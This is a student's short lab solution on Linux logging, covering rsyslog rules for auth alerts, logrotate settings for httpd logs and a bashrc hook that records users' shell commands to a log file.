Lab9 Solution Amirlan Sharipov (BS21-CS-01)
Table of Contents
1. Question 1
I would use rsyslog and journald. Forward them to ELK stack and use it as a SIEM. There are many people people familiar with the ELK stack, and it’s easy to scale it.
2. Question 2
> sudo cat /etc/rsyslog.d/auth-errors.conf auth.alert,authpriv.alert /var/log/auth-errors
3. Question 3
cat /etc/logrotate.d/httpd
/var/log/httpd/*log { rotate 10 compress missingok sharedscripts postrotate /usr/bin/systemctl reload httpd.service 2>/dev/null || true endscript }
’* */6 * * * logrotate /etc/logrotate.d/httpd
4. Question 4
5. Question 5
in /etc/bashrc:
export PROMPT_COMMAND=’RETRN_VAL=\(?;logger -p local6.debug "\)(whoami) [$$]: $(history 1 | sed “s/^[ ]*[0-9]\+[ ]*//” )“’
in /etc/rsyslog.d/bash.conf local6.* /var/log/commands.log
Taken from https://unix.stackexchange.com/questions/664581/how-do-i-log-all-commands-executed-by-all-users